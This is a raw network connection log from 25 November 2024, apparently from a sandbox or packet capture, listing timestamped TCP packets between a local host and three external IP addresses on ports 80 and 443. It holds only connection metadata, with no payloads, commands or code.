Nov 25, 2024 11:42:23.066864967 CET	49740	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:23.067039967 CET	80	49742	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:23.070575953 CET	49742	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:23.070769072 CET	49742	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:23.190253019 CET	80	49742	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:24.165915012 CET	80	49742	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:24.168060064 CET	49744	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:24.168081999 CET	443	49744	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:24.168148041 CET	49744	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:24.168585062 CET	49744	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:24.168600082 CET	443	49744	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:24.218266010 CET	49742	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:25.425019979 CET	443	49744	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:25.426839113 CET	49744	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:25.426857948 CET	443	49744	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:25.881246090 CET	443	49744	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:25.881314993 CET	443	49744	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:25.882972956 CET	49744	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:25.888226986 CET	49744	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:25.892100096 CET	49742	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:25.893239975 CET	49746	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:26.011984110 CET	80	49742	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:26.012124062 CET	49742	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:26.012753010 CET	80	49746	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:26.012850046 CET	49746	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:26.013082981 CET	49746	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:26.132658005 CET	80	49746	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:27.110678911 CET	80	49746	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:27.111933947 CET	49749	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:27.111967087 CET	443	49749	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:27.112082005 CET	49749	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:27.112338066 CET	49749	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:27.112349033 CET	443	49749	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:27.155803919 CET	49746	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:28.419929028 CET	443	49749	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:28.431358099 CET	49749	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:28.431377888 CET	443	49749	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:28.875545979 CET	443	49749	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:28.875622034 CET	443	49749	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:28.875982046 CET	49749	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:28.876327038 CET	49749	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:28.880064011 CET	49746	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:28.881468058 CET	49750	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:29.000688076 CET	80	49746	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:29.001702070 CET	80	49750	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:29.001843929 CET	49746	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:29.001898050 CET	49750	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:29.002105951 CET	49750	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:29.121474981 CET	80	49750	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:30.193272114 CET	80	49750	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:30.195662975 CET	49752	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:30.195710897 CET	443	49752	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:30.195919991 CET	49752	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:30.196388006 CET	49752	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:30.196404934 CET	443	49752	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:30.233947039 CET	49750	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:31.452570915 CET	443	49752	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:31.459917068 CET	49752	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:31.459956884 CET	443	49752	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:31.906620979 CET	443	49752	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:31.906697035 CET	443	49752	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:31.906795979 CET	49752	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:31.907433987 CET	49752	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:31.910995960 CET	49750	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:31.912267923 CET	49754	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:32.030962944 CET	80	49750	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:32.031019926 CET	49750	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:32.031732082 CET	80	49754	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:32.031805992 CET	49754	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:32.031975031 CET	49754	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:32.151487112 CET	80	49754	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:33.173333883 CET	80	49754	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:33.218358994 CET	49754	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:33.229500055 CET	49755	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:33.229542971 CET	443	49755	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:33.229615927 CET	49755	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:33.230220079 CET	49755	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:33.230232000 CET	443	49755	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:34.533169985 CET	443	49755	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:34.542404890 CET	49755	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:34.542428017 CET	443	49755	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:34.996773958 CET	443	49755	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:34.996834993 CET	443	49755	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:34.996898890 CET	49755	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:34.997499943 CET	49755	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:35.000809908 CET	49754	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:35.001705885 CET	49756	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:35.120718002 CET	80	49754	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:35.120815039 CET	49754	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:35.121162891 CET	80	49756	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:35.121402025 CET	49756	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:35.121562004 CET	49756	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:35.240952015 CET	80	49756	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:36.263787031 CET	80	49756	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:36.275213003 CET	49757	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:36.275326967 CET	443	49757	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:36.275405884 CET	49757	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:36.279465914 CET	49757	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:36.279501915 CET	443	49757	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:36.314241886 CET	49756	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:37.489598036 CET	443	49757	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:37.491947889 CET	49757	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:37.492036104 CET	443	49757	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:37.932795048 CET	443	49757	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:37.932857037 CET	443	49757	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:37.933166027 CET	49757	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:37.933504105 CET	49757	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:37.947356939 CET	49756	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:38.067653894 CET	80	49756	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:38.067730904 CET	49756	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:38.086647034 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:38.086708069 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:38.086801052 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:38.087336063 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:38.087349892 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:39.546459913 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:39.546717882 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:39.551081896 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:39.551090956 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:39.551342010 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:39.553229094 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:39.599319935 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:40.068403006 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:40.068480968 CET	443	49758	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:40.068538904 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:40.074472904 CET	49758	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:45.352777004 CET	49738	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:45.407896042 CET	49759	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:45.407943010 CET	443	49759	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:45.408020020 CET	49759	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:45.408313990 CET	49759	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:45.408329964 CET	443	49759	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:46.772234917 CET	443	49759	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:46.774127960 CET	49759	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:46.774142981 CET	443	49759	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:46.774199009 CET	49759	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:46.774208069 CET	443	49759	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:47.400718927 CET	443	49759	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:47.400796890 CET	443	49759	149.154.167.220	192.168.2.4
Nov 25, 2024 11:42:47.400845051 CET	49759	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:42:47.401776075 CET	49759	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:08.656369925 CET	49782	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:08.656413078 CET	443	49782	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:08.656505108 CET	49782	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:08.657221079 CET	49782	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:08.657238960 CET	443	49782	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:10.064992905 CET	443	49782	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:10.067090034 CET	49782	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:10.067125082 CET	443	49782	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:10.067184925 CET	49782	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:10.067193031 CET	443	49782	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:11.262953043 CET	443	49782	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:11.263082981 CET	443	49782	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:11.263186932 CET	49782	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:11.282819033 CET	49782	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:11.298755884 CET	49788	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:11.298800945 CET	443	49788	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:11.298872948 CET	49788	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:11.299139977 CET	49788	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:11.299154997 CET	443	49788	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:12.751127958 CET	443	49788	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:12.752712011 CET	49788	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:12.752748013 CET	443	49788	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:12.752810955 CET	49788	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:12.752815962 CET	443	49788	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:13.503340006 CET	443	49788	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:13.503583908 CET	443	49788	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:13.503638029 CET	49788	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:13.503937960 CET	49788	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:13.509370089 CET	49794	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:13.509413958 CET	443	49794	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:13.509490013 CET	49794	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:13.509721994 CET	49794	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:13.509738922 CET	443	49794	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:14.916760921 CET	443	49794	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:14.918416023 CET	49794	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:14.918440104 CET	443	49794	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:14.918508053 CET	49794	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:14.918525934 CET	443	49794	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:15.545171976 CET	443	49794	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:15.545248032 CET	443	49794	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:15.545310020 CET	49794	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:15.545756102 CET	49794	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:15.548487902 CET	49800	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:15.548535109 CET	443	49800	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:15.548619986 CET	49800	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:15.548847914 CET	49800	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:15.548863888 CET	443	49800	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:17.001449108 CET	443	49800	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:17.003909111 CET	49800	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:17.003930092 CET	443	49800	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:17.003981113 CET	49800	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:17.003993034 CET	443	49800	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:17.634294033 CET	443	49800	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:17.634368896 CET	443	49800	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:17.634479046 CET	49800	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:17.635088921 CET	49800	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:17.638135910 CET	49806	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:17.638170004 CET	443	49806	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:17.638323069 CET	49806	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:17.638588905 CET	49806	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:17.638602972 CET	443	49806	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:19.043761969 CET	443	49806	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:19.047538996 CET	49806	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:19.047561884 CET	443	49806	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:19.049021006 CET	49806	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:19.049027920 CET	443	49806	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:19.699425936 CET	443	49806	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:19.699508905 CET	443	49806	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:19.699585915 CET	49806	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:19.704499006 CET	49806	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:19.740767002 CET	49812	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:19.740809917 CET	443	49812	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:19.740931988 CET	49812	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:19.741302967 CET	49812	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:19.741317034 CET	443	49812	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:21.171258926 CET	443	49812	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:21.172794104 CET	49812	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:21.172805071 CET	443	49812	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:21.172858953 CET	49812	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:21.172868013 CET	443	49812	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:21.742332935 CET	443	49812	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:21.742417097 CET	443	49812	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:21.742647886 CET	49812	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:21.742948055 CET	49812	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:21.745632887 CET	49818	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:21.745656013 CET	443	49818	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:21.745740891 CET	49818	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:21.745940924 CET	49818	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:21.745951891 CET	443	49818	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:23.160007000 CET	443	49818	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:23.162045956 CET	49818	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:23.162085056 CET	443	49818	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:23.162139893 CET	49818	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:23.162148952 CET	443	49818	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:23.708467960 CET	443	49818	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:23.708559990 CET	443	49818	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:23.708620071 CET	49818	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:23.714735031 CET	49818	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:23.717932940 CET	49820	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:23.717986107 CET	443	49820	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:23.718077898 CET	49820	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:23.718432903 CET	49820	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:23.718463898 CET	443	49820	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:25.178710938 CET	443	49820	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:25.180213928 CET	49820	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:25.180284977 CET	443	49820	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:25.180357933 CET	49820	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:25.180380106 CET	443	49820	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:25.720201969 CET	443	49820	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:25.720278025 CET	443	49820	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:25.720339060 CET	49820	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:25.738924026 CET	49820	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:25.760718107 CET	49827	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:25.760756016 CET	443	49827	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:25.760848999 CET	49827	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:25.761428118 CET	49827	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:25.761445999 CET	443	49827	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:27.169823885 CET	443	49827	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:27.171632051 CET	49827	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:27.171648026 CET	443	49827	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:27.171817064 CET	49827	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:27.171823978 CET	443	49827	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:27.707031965 CET	443	49827	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:27.707106113 CET	443	49827	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:27.707155943 CET	49827	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:27.707874060 CET	49827	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:27.711774111 CET	49831	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:27.711819887 CET	443	49831	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:27.711884022 CET	49831	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:27.712114096 CET	49831	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:27.712126017 CET	443	49831	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:29.078049898 CET	443	49831	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:29.080108881 CET	49831	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:29.080128908 CET	443	49831	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:29.080229998 CET	49831	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:29.080236912 CET	443	49831	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:29.856829882 CET	443	49831	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:29.856939077 CET	443	49831	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:29.857047081 CET	49831	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:29.857557058 CET	49831	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:29.860507011 CET	49837	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:29.860533953 CET	443	49837	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:29.860595942 CET	49837	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:29.860837936 CET	49837	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:29.860852003 CET	443	49837	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:31.272099018 CET	443	49837	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:31.288060904 CET	49837	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:31.288081884 CET	443	49837	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:31.288161039 CET	49837	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:31.288170099 CET	443	49837	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:31.823554993 CET	443	49837	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:31.823760986 CET	443	49837	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:31.823812008 CET	49837	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:31.824068069 CET	49837	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:31.826411963 CET	49843	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:31.826457977 CET	443	49843	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:31.826555967 CET	49843	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:31.826761007 CET	49843	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:31.826780081 CET	443	49843	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:33.239033937 CET	443	49843	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:33.242660999 CET	49843	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:33.242672920 CET	443	49843	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:33.242742062 CET	49843	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:33.242748976 CET	443	49843	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:33.777357101 CET	443	49843	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:33.777661085 CET	443	49843	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:33.777736902 CET	49843	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:33.778018951 CET	49843	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:33.781697989 CET	49849	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:33.781733036 CET	443	49849	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:33.781800985 CET	49849	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:33.782093048 CET	49849	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:33.782107115 CET	443	49849	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:35.196367025 CET	443	49849	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:35.200952053 CET	49849	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:35.200967073 CET	443	49849	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:35.201035976 CET	49849	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:35.201044083 CET	443	49849	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:35.768881083 CET	443	49849	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:35.769088984 CET	443	49849	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:35.769151926 CET	49849	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:35.769728899 CET	49849	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:35.773906946 CET	49855	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:35.773933887 CET	443	49855	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:35.774041891 CET	49855	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:35.774435997 CET	49855	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:35.774451017 CET	443	49855	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:37.148539066 CET	443	49855	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:37.152961969 CET	49855	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:37.152981043 CET	443	49855	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:37.153060913 CET	49855	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:37.153065920 CET	443	49855	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:38.050734043 CET	443	49855	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:38.051022053 CET	443	49855	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:38.051090956 CET	49855	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:38.051544905 CET	49855	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:38.054465055 CET	49861	443	192.168.2.4	149.154.167.220
Nov 25, 2024 11:43:38.054481983 CET	443	49861	149.154.167.220	192.168.2.4
Nov 25, 2024 11:43:38.054567099 CET	49861	443	192.168.2.4	149.154.167.220
